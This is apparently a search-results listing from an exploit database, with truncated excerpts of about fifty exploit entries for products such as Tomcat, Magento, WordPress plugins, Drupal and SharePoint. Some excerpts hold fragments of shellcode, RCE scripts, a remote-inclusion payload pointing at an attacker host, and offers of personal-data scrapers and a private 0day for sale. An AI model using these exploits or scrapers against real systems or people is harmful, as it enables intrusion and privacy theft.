39001 matches found
Apache Tomcat 8.5.63 / 9.0.43 HTTP Response Smuggling Vulnerability
Apache Tomcat suffers from a client-side de-sync vulnerability via HTTP request smuggling. Apache Tomcat versions 8.5.7 through 8.5.63 and 9.0.0-M11 through 9.0.43 are vulnerable. Exploit Title: CVE-2024-21733 Apache Tomcat HTTP Request Smuggling Date: 1/31/2024 Exploit Author: xer0dayz Vendor...
Pimcore < 5.71 Unserialize Remote Code Execution Exploit
This Metasploit module exploits a PHP unserialize in Pimcore before 5.7.1 to execute arbitrary code. An authenticated user with "classes" permission could exploit the vulnerability. The vulnerability exists in the "ClassController.php" class, where the "bulk-commit" method makes it possible to...
Magento 2.4.0 / 2.3.5p1 (and earlier) Arbitrary Code Execution 0day Exploit
Magento versions 2.4.0 and 2.3.5p1 and earlier are affected by an unsafe file upload vulnerability that could result in arbitrary code execution. This vulnerability could be abused by authenticated users with administrative permissions to the System/Data and Transfer/Import components...
XAMPP 1.8.x Multiple Vulnerabilities
Exploit for multiple platform in category remote exploits Exploit Name : XAMPP 1.8.x Multiple Vulnerabilities Author : DevilScreaM Date : 6 October 2014 Vendor : http://bitnami.com Version : 1.8.x or Higher Version Operating System : Windows / Linux Vulnerability : Cross Site Scripting / Write Fi...
Infoblox NetMRI 7.1.4 Shell Escape / Privilege Escalation Vulnerabilities
Exploit for hardware platform in category remote exploits Title: Infoblox NetMRI Administration Shell Escape and Privilege Escalation Advisory ID: KL-001-2017-017 Publication Date: 2017.10.24 Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-017.txt 1. Vulnerability...
Truecaller search limit bypass and gathering information Exploit
this exploit will bypass the truecaller and get the datas of the user and phone number fully automated exploit to extract the data Usage Info 1.save file first as truecaller.py and send as generator.py 2.the run the program and enter the value what it asked and wait for few min the process will g...
XAMPP 7.4.3 - Local Privilege Escalation Vulnerability
Exploit Title: XAMPP 7.4.3 - Local Privilege Escalation Exploit Author: Salman Asad @deathflash1411, email protected Original Author: Maximilian Barz @S1lkys Vendor Homepage: https://www.apachefriends.org Version: XAMPP 7.2.29, 7.3.x 7.3.16 & 7.4.x 7.4.4 Tested on: Windows 10 + XAMPP 7.3.10...
WonderCMS 3.1.0 XSS / Directory Traversal / File Upload Vulnerabilities
Exploit for php platform in category web applications title: Multiple Vulnerabilities product: WonderCMS vulnerable version: =3.1.0 fixed version: - CVE number: - impact: High homepage: https://www.wondercms.com/ found: 2020-04-30 by: Calvin Phang Office Singapore SEC Consult Vulnerability Lab An...
Windows/x86 - Messagebox Shellcode 358 bytes
// Exploit Title : win32 Messagebox shellcode 358 bytes // Exploit Author : Febriyanto Nugroho email protected // Tested on : Windows 7 x86 Ultimate include include char shellcode= "\x31\xdb\xb3\x30\x29\xdc\x64\x8b\x03\x8b\x40\x0c\x8b" "\x58\x1c\x8b\x1b\x8b\x1b\x8b\x73\x08\x89\xf7\x89\x3c"...
GoAhead Web Server 2.5 < 3.6.5 - HTTPd LD_PRELOAD Arbitrary Module Load Exploit
This Metasploit module triggers an arbitrary shared library load vulnerability in GoAhead web server versions between 2.5 and that have the CGI module enabled. This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class...
Redis-cli < 5.0 - Buffer Overflow Exploit
Exploit for linux platform in category local exploits Exploit Title: Redis-cli 5.0 - Buffer Overflow PoC Exploit Author: Fakhri Zulkifli Vendor Homepage: https://redis.io/ Software Link: https://redis.io/download Version: 5.0, 4.0, 3.2 Fixed on: 5.0, 4.0, 3.2 CVE : CVE-2018-12326 Buffer overflow ...
OpenNetAdmin 18.1.1 - Remote Code Execution Exploit
Exploit for php platform in category web applications Exploit Title: OpenNetAdmin v18.1.1 RCE Exploit Author: mattpascoe Vendor Homepage: http://opennetadmin.com/ Software Link: https://github.com/opennetadmin/ona Version: v18.1.1 Tested on: Linux !/bin/bash URL="$1" while true;do echo -n "$ ";...
Joomla com_hdwplayer 4.2 - (search.php) SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title: Joomla! comhdwplayer 4.2 - 'search.php' SQL Injection Dork: inurl:"index.php?option=comhdwplayer" Exploit Author: qw3rTyTy Vendor Homepage: https://www.hdwplayer.com/ Software Link: https://www.hdwplayer.com/download/ Version: 4...
Apache APISIX Remote Code Execution Exploit
Apache APISIX has a default, built-in API token that can be used to obtain full access of the admin API. Access to this API allows for remote LUA code execution through the script parameter added in the 2.x version. This module also leverages another vulnerability to bypass th e IP restriction...
SharePoint Workflows XOML Injection Exploit
This Metasploit module exploits a vulnerability within SharePoint and its .NET backend that allows an attacker to execute commands using specially crafted XOML data sent to SharePoint via the Workflows functionality. This module requires Metasploit: https://metasploit.com/download Current source:...
Joomla 3.6.5 Remote code execution Exploit 0day
Joomla 3.6.5 Core suffers from a remote code execution vulnerability. Joomla Core affected Joomla! 3.6.X versions. Exploit automated. It is possible to specify a list of sites. For the work you need to install Python. This is private exploit. You can buy it at https://0day.today...
Wordpress plugins wp-catpro Arbitrary File Upload Vulnerability
The attacker can uplaod file/shell.php.gif 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site :...
Zimbra Zip Path Traversal Exploit
This Metasploit module POSTs a ZIP file containing path traversal characters to the administrator interface for Zimbra Collaboration Suite. If successful, it plants a JSP-based backdoor within the web directory, then executes it. The core vulnerability is a path traversal issue in Zimbra...
Apache HTTP Server 2.4.50 - Remote Code Execution Exploit (3)
Exploit Title: Apache HTTP Server 2.4.50 - Remote Code Execution RCE 3 Exploit Author: Valentin Lobstein Vendor Homepage: https://apache.org/ Software Link: https://github.com/Balgogan/CVE-2021-41773 Version: Apache 2.4.49/2.4.50 CGI enabled Tested on: Debian GNU/Linux CVE : CVE-2021-41773 /...
Ubuntu Server snap-confine must_mkdir_and_open_with_perms() Race Condition Vulnerability
Qualys discovered a race condition CVE-2022-3328 in snap-confine, a SUID-root program installed by default on Ubuntu. In this advisory,they tell the story of this vulnerability which was introduced in February 2022 by the patch for CVE-2021-44731 and detail how they exploited it in Ubuntu Server ...
Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation Exploit
Exploit for linux platform in category local exploits / disablemapminadd.c / / / include include include include include include include / offsets might differ, kernel was custom compiled you can read vmlinux and caculate the offset when testing / / define OFFSETKERNELBASE 0x000000 / define...
WordPress Core - load-scripts.php Denial of Service Exploit
Exploit for php platform in category dos / poc EDB Note: python doser.py -g...
7-zip - Code Execution / Local Privilege Escalation Exploit
Exploit Title: 7-zip - Code Execution / Local Privilege Escalation Exploit Author: Kağan Çapar Vendor homepage: https://www.7-zip.org/ Software link: https://www.7-zip.org/a/7z2107-x64.msi Version: 21.07 and all versions Tested On: Windows 10 Pro x64 References:...
Facebook hidden profile data disclosure Exploit
This lets you gather a bunch of information, even if it is private. phone number, email, ip-address, birthday, etc. Material can automatically collect data and save, possible to connect a proxy list...
Maltrail v0.53 - Unauthenticated Remote Code Execution Exploit
Exploit Title: Maltrail v0.53 - Unauthenticated Remote Code Execution RCE Exploit Author: Iyaad Luqman K init6 Application: Maltrail v0.53 Tested on: Ubuntu 22.04 CVE: CVE-2023-27163 PoC import sys; import os; import base64; def main: listeningIP = None listeningPORT = None targetURL = None if...
Microsoft Windows x64 – Privilege Escalation (UAC Protection Bypass printui.exe) Exploit
include include include include "resource.h" include include include define err -1 define dis 0 define def 1 define max 2 define BUFFER 8192 int CheckUac int ConsentAdmin; int EnableLua; DWORD BufferSize = BUFFER; RegGetValueHKEYLOCALMACHINE,...
WordPress WoodMart Theme 7.1.1 Cross Site Request Forgery Vulnerability
WordPress WoodMart Theme versions 7.1.1 and below suffer from a cross site request forgery vulnerability due to missing nonce validation on the processform function. ==== Z://USB-00RESEARCH/WORDPRESS/ ============================================= 2023 == Report Title: WordPress WoodMart Theme =...
WampServer 2.1 Remote File Download Exploit
Exploit for php platform in category web applications !/usr/bin/perl In The name of Allah Title : WampServer 2.1 Remote File Download Exploit Author : KedAns-Dz E-mail : email protected Home : HMD/AM 30008/04300 - Algeria -00213555248701 Twitter page : twitter.com/kedans platform : php Impact :...
Drupal 7.0 < 7.31 - Drupalgeddon SQL Injection (Admin Session) Exploit
Exploit for php platform in category web applications //· include 'common.inc'; include 'password.inc'; // set values $username = 'admin'; $url = isset$argv1?$argv1:''; $userid = isset$argv2?intval$argv2:1; if $url == '-h' echo "usage:\n"; echo $argv0.' $url $userid'."\n"; die; if empty$url ||...
Concrete5 < 8.3.0 - Username / Comments Enumeration Exploit
Exploit for php platform in category web applications !/usr/bin/env python3 Concrete5 8.3 vulnerable to Authorization Bypass Through User-Controlled Key IDOR CVE-2017-18195 Chapman R3naissance Schleiss from queue import Queue from threading import Thread from bs4 import BeautifulSoup from tabulat...
Jetty 9.2.8 Shared Buffer Leakage Vulnerability
Gotham Digital Science discovered a critical information leakage vulnerability in the Jetty web server that allows an unauthenticated remote attacker to read arbitrary data from previous requests and responses submitted to the server by other users. Jetty versions 9.2.3 through 9.2.8 are affected...
PHP Live! <= 3.2.1 (help.php) Remote Inclusion Vulnerability
Exploit for unknown platform in category web applications ============================================================ PHP Live! ----------- Execution: help.php?csspath=htt://attacker setup/header.php?csspath=htt://attacker ----------- Vendor: At the moment, there are no solutions from the vendor...
Microsoft Office Word MSDTJS Code Execution Exploit
This Metasploit module generates a malicious Microsoft Word document that when loaded, will leverage the remote template feature to fetch an HTML document and then use the ms-msdt scheme to execute PowerShell code. This module requires Metasploit: https://metasploit.com/download Current source:...
Netatalk < 3.1.12 - Authentication Bypass Exploit
Exploit Title: Netatalk Authentication Bypass Exploit Author: Jacob Baines Vendor Homepage: http://netatalk.sourceforge.net/ Software Link: https://sourceforge.net/projects/netatalk/files/ Version: Before 3.1.12 Tested on: Seagate NAS OS x8664 CVE : CVE-2018-1160 Advisory:...
WordPress GPX Viewer 2.2.8 Arbitrary File Creation Exploit
import argparse import requests from requests.sessions import Session import time banner = """ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗ ██████╗ ██████╗ ██████╗ █████╗ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗╚════██╗██║ ██║ ███║██╔═████╗██╔════╝ ╚════██╗██╔══██╗ ██║ ██║...
PHP 7.2 - imagecolormatch() Out of Band Heap Write Exploit
&c= Example: GET/POST /exploit.php?f=0x7fe83d1bb480&c=id++/dev/shm/titi Target: PHP 7.2.x Tested on: PHP 7.2.12 / buf = unsigned long safeemallocsizeofunsigned long, 5 im2-colorsTotal, 0; for x=0; xsx; x++ for y=0; ysy; y++ color = im2-pixelsyx; rgb = im1-tpixelsyx; bp = buf + color 5; bp++++; bp...
PHPizabi v0.848b C1 HFP1 Reinstall Script Vulnerability
Exploit for php platform in category web applications ======================================================= PHPizabi v0.848b C1 HFP1 Reinstall Script Vulnerability ======================================================= 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 ...
SharePoint DataSet / DataTable Deserialization Exploit
A remotely exploitable vulnerability exists within SharePoint that can be leveraged by a remote authenticated attacker to execute code within the context of the SharePoint application service. The privileges in this execution context are determined by the account that is specified when SharePoint...
glFusion <= 1.1.2 COM_applyFilter()/order SQL Injection Exploit
Exploit for unknown platform in category web applications =============================================================== glFusion = 4.1 php.ini independent google dork: "Page created in" "seconds by glFusion" +RSS Vulnerability, sql injection in 'order' and 'direction' arguments: look...
Squid 4.14 / 5.0.5 Code Execution / Double Free Vulnerabilities
A Double-Free bug was found in Squid versions 4.14 and 5.0.5 when processing the "acl" directive on configuration files, more specifically the first and second addresses. This may allow arbitrary code execution on a Squid deployment on where the configuration files may be processed from untrusted...
Google Chrome 78.0.3904.70 - Remote Code Execution Exploit
Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution Exploit Author: deadlock Forrest Orr Type: RCE Platform: Windows Website: https://forrest-orr.net Twitter: https://twitter.com/ForrestOrr Vendor Homepage: https://www.google.com/chrome/ Software Link:...
WordPress File Manager 6.8 Remote Code Execution Exploit
The WordPress File Manager wp-file-manager plugin versions 6.0 through 6.8 allows remote attackers to upload and execute arbitrary PHP code because it renames an unsafe example elFinder connector file to have the .php extension. This, for example, allows attackers to run the elFinder upload or...
uftpd 2.10 - Directory Traversal (Authenticated) Vulnerability
Exploit Title: uftpd 2.10 - Directory Traversal Authenticated Exploit Author: Aaron Esau arinerron Vendor Homepage: https://github.com/troglobit/uftpd Software Link: https://github.com/troglobit/uftpd Version: 2.7 to 2.10 Tested on: Linux CVE : CVE-2020-20277 Reference:...
WebKit On iOS PAC / JIT Hardening Bypass Vulnerability
PAC and JIT Hardening Bypass in WebKit on iOS As per discussions with email protected, Apple would like to treat the PAC bypass described here as a security vulnerability by itself. The bypass was initially reported without a deadline on May 6. After receiving the reply that they will treat it as...
Hikvision Remote Code Execution / XSS / SQL Injection Vulnerabilities
Some Hikvision Hybrid SAN products were vulnerable to multiple remote code execution command injection vulnerabilities, including reflected cross site scripting, Ruby code injection, classic and blind SQL injection resulting in remote code execution that allows an adversary to execute arbitrary...
phpVibe - Aribtrary File Disclosure Vulnerability
Exploit for php platform in category web applications In The Name Of ALLAH Exploit Title: phpVibe ALL versions LFD vulnerability Google Dork: "powered by phpvibe" Date: 2015/07/13 july 13th Exploit Author: ali ahmady -- Iranian Security Researcher snip3rirathotmail.com Vendor Homepage:...
Apache mod_session_crypto - Padding Oracle Vulnerability
Apache modsessioncrypto versions 2.3 through 2.5 suffer form a padding oracle vulnerability. Padding Oracle in Apache modsessioncrypto During a penetration test, RedTeam Pentesting discovered a Padding Oracle vulnerability in modsessioncrypto of the Apache web server. This vulnerability can be...
Gogs Git Hooks Remote Code Execution Exploit
This Metasploit module leverages an insecure setting to get remote code execution on the target OS in the context of the user running Gogs. This is possible when the current user is allowed to create git hooks, which is the default for administrative users. For non-administrative users, the...
Wordpress Maintenance Mode by SeedProd 5.1.1 Plugin - Persistent Cross-Site Scripting Vulnerability
Exploit for php platform in category web applications Exploit Title: Wordpress Plugin Maintenance Mode by SeedProd 5.1.1 - Persistent Cross-Site Scripting Vendor Homepage: https://www.seedprod.com/ Vendor Changelog: https://wordpress.org/plugins/coming-soon/developers Exploit Author: Jinson...
WeBID CSRF Vulnerability (All Version)
Exploit for php platform in category web applications Title : WeBID CSRF Vulnerability All Version Author : L3b-r1'z Date : 12.MAR.30 Security : LOW Google Dork : allintext: "powered by webid" Note : Works IF magicquotesgpc = off . P0C : Example Site : http://mcs-1.com/ http://usedwiiu.com/...